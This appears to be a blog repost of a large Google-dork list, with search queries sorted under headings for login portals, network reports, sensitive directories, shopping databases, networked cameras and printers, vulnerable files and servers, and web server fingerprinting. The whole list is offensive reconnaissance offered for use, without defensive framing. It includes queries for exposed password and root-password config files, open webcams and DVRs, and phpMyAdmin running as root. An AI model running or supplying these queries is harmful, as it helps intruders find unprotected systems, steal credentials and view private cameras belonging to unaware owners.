intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"ฉ (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak้.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "Powered by IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ฉ Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -javascript
inurl:"webadmin" filetype:nsf
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream ฉ *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
Powered by INDEXU
Ultima Online loginservers
W-Nailer Upload Area
==============================
Page Containing Network Data :

filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered by phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last updated" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
=================================
Sensitive Directories :

"Directory Listing for" "Hosted by Xerver"
"Index Of /network" "last modified"
"index of cgi-bin"
"index of" / picasa.ini
"index of" inurl:recycler
"Index of" rar r01 nfo Modified 2004
"intitle:Index.Of /" stats merchant cgi-* etc
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Web File Browser" "Use regular expression"
"Welcome to phpMyAdmin" " Create new database"
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
allintitle:"FirstClass Login"
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
Index of phpMyAdmin
index.of.dcim
index.of.password
index.of.password
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
intitle:"album permissions" "Users who can modify photos" "EVERYBODY"
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )"
intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"HFS /" +"HttpFileServer"
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:"Index of /CFIDE/" administrator
intitle:"Index of c:\Windows"
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intitle:"index of" -inurl:htm -inurl:html mp3
intitle:"Index of" cfide
intitle:"index of" intext:"content.ie5"
intitle:"index of" inurl:ftp (pub | incoming)
intitle:"index.of.personal"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:index.of /AlbumArt_
intitle:index.of /maildir/new/
intitle:index.of abyss.conf
intitle:index.of WEB-INF
intitle:intranet inurl:intranet +intext:"human resources"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
inurl:/pls/sample/admin_/help/
inurl:/tmp
inurl:backup intitle:index.of inurl:admin
inurl:explorer.cfm inurl:(dirpath|This_Directory)
inurl:install.pl intext:"Reading path paramaters" -edu
inurl:j2ee/examples/jsp
inurl:ojspdemos
log inurl:linklint filetype:txt -"checking"
Look in my backup directories! Please?
private
protected
secret
secure
winnt
===============================
Sensitive OnLine Shopping Info :

"More Info about MetaCart Free"
Comersus.mdb database
intext:"powered by Hosting Controller" intitle:Hosting.Controller
intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com
inurl:midicart.mdb
inurl:shopdbtest.asp
POWERED BY HIT JAMMER 1.0!
site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"
VP-ASP Shop Administrators only
=============================
Varios OnLine Devices:

"Copyright (c) Tektronix, Inc." "printer status"
"display printer status" intitle:"Home"
"intitle:Cisco Systems, Inc. VPN 3000 Concentrator"
"OK logout" inurl:vb.htm?logout=1
"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw
"please visit" intitle:"i-Catcher Console" Copyright "iCode Systems"
"powered by webcamXP" "Pro|Broadcast"
"RICOH Network Printer D model-Restore Factory"
"Starting SiteZAP 6.0"
"Summary View of Sensors" | "sensorProbe8 v *" | "cameraProbe 3.0" -filetype:pdf -filetype:html
"This page is for configuring Samsung Network Printer" | printerDetails.htm
"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -sit
"Webthru User Login"
( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")
("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"
("port_255/home")|(inurl:"home?port=255")
(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp
(intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g
(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)
(inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)
Aficio 1022
allintitle:Brains, Corp. camera
allinurl:index.htm?cus?audio
Axis Network Cameras
axis storpoint "file view" inurl:/volumes/
camera linksys inurl:main.cgi
Canon ImageReady machines
Canon Webview netcams
DCS inurl:"/web/login.asp"
Display Cameras intitle:"Express6 Live Image"
ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"
filetype:cgi transcoder.cgi
intext:"MaiLinX Alert (Notify)" -site:networkprinters.com
intext:"Please enter correct password for Administrator Access. Thank you" "Copyright ฉ 2003 SMC Networks, Inc. All rights reserved."
intext:"Powered by: Adobe PrintGear" inurl:admin
intext:"Ready with 10/100T Ethernet"
intext:"UAA (MSB)" Lexmark -ext:pdf
intext:"Videoconference Management System" ext:htm
intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"
intext:"you to handle frequent configuration jobs easily and quickly" | intitle:"Show/Search other devices"
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi
intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"
intitle:"active webcam page"
intitle:"AR-*" "browser of frame dealing is necessary"
intitle:"AudioReQuest.web.server"
intitle:"AXIS 240 Camera Server" intext:"server push" -help
intitle:"axis storpoint CD" intitle:"ip address"
intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000
intitle:"BorderManager Information alert"
intitle:"BorderWare MXtreme Mail Firewall Login"
intitle:"Browser Launch Page"
intitle:"Cayman-DSL.home"
intitle:"configuration" inurl:port_0
intitle:"DEFAULT_CONFIG - HP"
intitle:"DEFAULT_CONFIG - HP"
intitle:"Dell *" inurl:port_0
intitle:"Dell Laser Printer *" port_0
intitle:"Dell Laser Printer M5200" port_0
intitle:"Dell Laser Printer" ews
intitle:"Device Status Summary Page" -demo
intitle:"dreambox web"
intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop
intitle:"DVR Web client"
intitle:"Edr1680 remote viewer"
intitle:"EpsonNet WebAssist Rev"
intitle:"Ethernet Network Attached Storage Utility"
intitle:"EverFocus.EDSR.applet"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"Freifunk.Net - Status" -site:commando.de
intitle:"GCC WebAdmin" -gcc.ru
intitle:"GigaDrive Utility"
intitle:"Home" "Xerox Corporation" "Refresh Status"
intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."
intitle:"INTELLINET" intitle:"IP Camera Homepage"
intitle:"InterJak Web Manager"
intitle:"Iomega NAS Manager" -ihackstuff.com
intitle:"ipcop - main"
intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"
intitle:"IVC Control Panel"
intitle:"iVISTA.Main.Page"
intitle:"Java Applet Page" inurl:ml
intitle:"lantronix web-manager"
intitle:"Lexmark *" inurl:port_0
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Middle frame of Videoconference Management System" ext:htm
intitle:"my webcamXP server!" inurl:":8080"
intitle:"NAS" inurl:indexeng.html
intitle:"NeroNET - burning online"
intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces
intitle:"NetCam Live Image" -.edu -.gov .com
intitle:"Netcam" intitle:"user login"
intitle:"Netopia Router (*.)""to view this site"
intitle:"Network Print Server" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )
intitle:"Network Print Server" intext:"http://www.axis.com" filetype:shtm
intitle:"Network Storage Link for USB 2.0 Disks" Firmware
intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"
intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"
intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a
intitle:"PacketShaper Customer Login"
intitle:"Service Managed Gateway Login"
intitle:"Setup Home" "You will need * log in before * * change * settings"
intitle:"Sipura.SPA.Configuration" -.pdf
intitle:"Skystream Networks Edge Media Router" -securitytracker.com
intitle:"Smoothwall Express" inurl:cgi-bin "up * days"
intitle:"Snap Server" intitle:"Home" "Active Users"
intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"
intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml
intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"
intitle:"SpeedStream * Management Interface"
intitle:"Summit Management Interface" -georgewbush.org.uk
intitle:"supervisioncam protocol"
intitle:"switch home page" "cisco systems" "Telnet - to"
intitle:"switch login" "IBM Fast Ethernet Desktop"
intitle:"SWW link" "Please wait....."
intitle:"TANDBERG" "This page requires a frame capable browser!"
intitle:"The AXIS 200 Home Page"
intitle:"toshiba network camera - User Login"
intitle:"V-Gear BEE"
intitle:"V1" "welcome to phone settings" password
intitle:"Veo Observer Web Client"
intitle:"View and Configure PhaserLink"
intitle:"WEBDVR" -inurl:product -inurl:demo
intitle:"Webview Logon Page"
intitle:"WxGoos-" ("Camera image"|"60 seconds" )
intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."
intitle:"Connection Status" intext:"Current login"
intitle:asterisk.management.portal web-access
intitle:Axis inurl:"/admin/admin.shtml"
intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"
intitle:HomeSeer.Web.Control | Home.Status.Events.Log
intitle:iDVR -intitle:"com | net | shop" -inurl:"asp | htm | pdf | html | php | shtml | com | at | cgi | tv"
intitle:jdewshlp "Welcome to the Embedded Web Server!"
intitle:Linksys site:ourlinksys.com
intitle:RICOH intitle:"Network Administration"
intitle:webeye inurl:login.ml
inurl:"8003/Display?what="
inurl:":631/printers" -php -demo
inurl:"CgiStart?page="
inurl:"ipp/pdisplay.htm"
inurl:"level/15/exec/-/show"
inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi
inurl:"port_255" -htm
inurl:"printer/main.html" intext:"settings"
inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mobile"
inurl:/en/help.cgi "ID=*"
inurl:/img/vr.htm
inurl:axis-cgi
inurl:camctrl.cgi
inurl:hp/device/this.LCDispatcher
inurl:JPGLogin.htm
inurl:na_admin
inurl:netw_tcp.shtml
inurl:Printers/ipp_0001.asp
inurl:setdo.cgi intext:"Set DO OK"
inurl:start.htm?scrw=
inurl:TiVoConnect?Command=QueryServer
Konica Network Printer Administration
Mobotix netcams
More Axis netcams !
Panasonic Network Cameras
Panasonic WJ-NT104 netcams
Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype:shtml
Phasers 4500/6250/8200/8400
printers/printman.html
Seyeon FlexWATCH cameras
site:.viewnetcam.com -www.viewnetcam.com
Sony SNC-RZ20 network cameras
Sony SNC-RZ30 Network Cameras
tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml
WebControl intitle:"AMX NetLinx"
Winamp Web Interface
Xerox Phaser 6250
Xerox Phaser 8200
Xerox Phaserฎ 740 Color Printer
Xerox Phaserฎ 840 Color Printer
==============================
Vulnerable File :

filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)
"e107.org 2002/2003" inurl:forum_post.php?nt
"File Upload Manager v1.3" "rename to"
"Mail-it Now!" intitle:"Contact form" | inurl:contact.php
"maxwebportal" inurl:"default" "snitz forums" +"homepage" -intitle:maxwebportal
"Powered by FlexPHPNews" inurl:news | inurl:press
"Powered by FunkBoard"
"Powered by Gravity Board"
"Powered by Land Down Under 601"
"powered by mailgust"
"powered by my little forum"
"Powered by SilverNews"
"Powered by Xcomic"
"powered by YellDL"
"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php
"Warning:" "Cannot execute a blank command in"
ext:asp "powered by DUForum" inurl:(messages|details|login|default|register) -site:duware.com
ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com
ext:cgi inurl:ubb6_test
ezBOO "Administrator Panel" -cvs
filetype:cgi inurl:cachemgr.cgi
filetype:cnf my.cnf -cvs -example
filetype:inc inc intext:setcookie
filetype:lit lit (books|ebooks)
filetype:mdb "standard jet"
filetype:mdb inurl:"news/news"
filetype:php inurl:"viewfile" -"index.php" -"idfil
filetype:wsdl wsdl
Gallery configuration setup files
intitle:"ASP FileMan" Resend -site:iisworks.com
intitle:"CJ Link Out V1"
intitle:"Control panel" "Control Panel Login" ArticleLive inurl:admin -demo
intitle:"Directory Listing" "tree view"
intitle:"Index of /" modified php.exe
intitle:"PHP Explorer" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)
intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"
intitle:"PHPstat" intext:"Browser" intext:"PHPstat setup"
intitle:"SSHVnc Applet"OR intitle:"SSHTerm Applet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com
intitle:mywebftp "Please enter your password"
inurl:" WWWADMIN.PL" intitle:"wwwadmin"
inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"
inurl:"plog/register.php"
inurl:cartwiz/store/index.asp
inurl:cgi-bin inurl:bigate.cgi
inurl:cgi.asx?StoreID
inurl:changepassword.cgi -cvs
inurl:click.php intext:PHPClickLog
inurl:guestbook/guestbooklist.asp "Post Date" From Country
inurl:nquser.php filetype:php
inurl:php.exe filetype:exe -example.com
inurl:robpoll.cgi filetype:cgi
inurl:updown.php | intext:"Powered by PHP Uploader Downloader"
link:http://www.toastforums.com/
PHP-Nuke - create super user right now !
PHPFreeNews inurl:Admin.php
The brada List
=============================
Vulnerable Server :

"ftp://" "www.eastgame.net"
"html allowed" guestbook
"Powered by: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
=============================
Web Server Detection :

intitle:"Welcome to the Advanced Extranet Server, ADVX!"
"About Mac OS Personal Web Sharing"
"AnWeb/1.42h" intitle:index.of
"CERN httpd 3.0B (VAX VMS)"
"httpd+ssl/kttd" * server at intitle:index.of
"JRun Web Server" intitle:index.of
"MaXX/3.1" intitle:index.of
"Microsoft-IIS/* server at" intitle:index.of
"Microsoft-IIS/4.0" intitle:index.of
"Microsoft-IIS/5.0 server at"
"Microsoft-IIS/6.0" intitle:index.of
"Netware * Home" inurl:nav.html
"Novell, Inc" WEBACCESS Username Password "Version *.*" Copyright -inurl:help -guides|guide
"OmniHTTPd/2.10" intitle:index.of
"OpenSA/1.0.4" intitle:index.of
"powered by" "shoutstats" hourly daily
"Red Hat Secure/2.0"
"Red Hat Secure/3.0 server at"
"seeing this instead" intitle:"test page for apache"
"Switch to table format" inurl:table|plain
(intitle:"502 Proxy Error")|(intitle:"503 Proxy Error") "The proxy server could not handle the request" -topic -mail -4suite -list -site:geocrawler.co
(inurl:81-cobalt | inurl:cgi-bin/.cobalt)
aboutprinter.shtml (More Xerox printers on the web!)
allintext:"Powered by LionMax Software" "WWW File Share"
allintitle:Netscape FastTrack Server Home Page
allinurl:".nsconfig" -sample -howto -tutorial
Apache online documentation
Environment vars
fitweb-wwws * server at intitle:index.of
IIS 4.0
index_i.shtml Ready (Xerox printers on the web!)
intext:"404 Object Not Found" Microsoft-IIS/5.0
intext:"Target Multicast Group" "beacon"
intitle:"300 multiple choices"
intitle:"Apache Status" "Apache Server Status for"
intitle:"Directory Listing, Index of /*/"
intitle:"Document title goes here" intitle:"used by web search tools" " example of a simple Home Page"
intitle:"error 404" "From RFC 2068 "
intitle:"IPC@CHIP Infopage"
intitle:"Lotus Domino Go Webserver:" "Tuning your webserver" -site:ibm.com
intitle:"Object not found!" intext:"Apache/2.0.* (Linux/SuSE)"
intitle:"Object not found" netware "apache 1.."
intitle:"Open WebMail" "Open WebMail version (2.20|2.21|2.30) "
intitle:"Resin Default Home Page"
intitle:"Shoutcast Administrator"
intitle:"Test Page for Apache"
intitle:"Test Page for Apache" "It Worked!"
intitle:"Test Page for Apache" "It Worked!" "on this web"
intitle:"Test Page for the Apache HTTP Server on Fedora Core" intext:"Fedora Core Test Page"
intitle:"Welcome to 602LAN SUITE *"
intitle:"welcome to mono xsp"
intitle:"Welcome to Windows Small Business Server 2003"
intitle:"Welcome To Xitami" -site:xitami.com
intitle:"Welcome to Your New Home Page!" "by the Debian release"

»»  READMORE...

handapeunpost